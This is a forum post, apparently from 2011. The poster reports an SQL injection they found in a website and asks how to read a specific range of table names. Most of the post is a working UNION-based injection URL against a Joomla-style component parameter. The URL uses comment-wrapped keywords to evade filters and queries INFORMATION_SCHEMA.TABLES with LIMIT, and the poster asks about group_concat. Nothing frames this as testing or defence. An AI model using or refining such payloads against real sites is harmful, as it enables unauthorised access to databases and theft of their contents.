read limited number of table
Date: November 21, 2011 05:14AM
Hi guys,
I have a SQL injection in a site and IT has 94 columns I want to read a specific range of the tables how can I do that ...?? I have tried to use limit x,y but it didn't work
i.e
http://www.site.com/index.php?option=com_library&id=-16%27+/*!UNION*/+select+1,2,/*!%28TABLE_NAME%29*/,4+/*!FROM*/+/*!INfoRMAtION_SCHEMA.TABLES*/+/*!Where*/+/*!TABLE_SCHEMA=database%28%29*/+limit%201,3--%20-
this should show me the three first tables but it only shows me the first one ...and when I make group_concat(table_name) I got nothing !! I think group concat doesn't work with the limit ?? Am I correct ?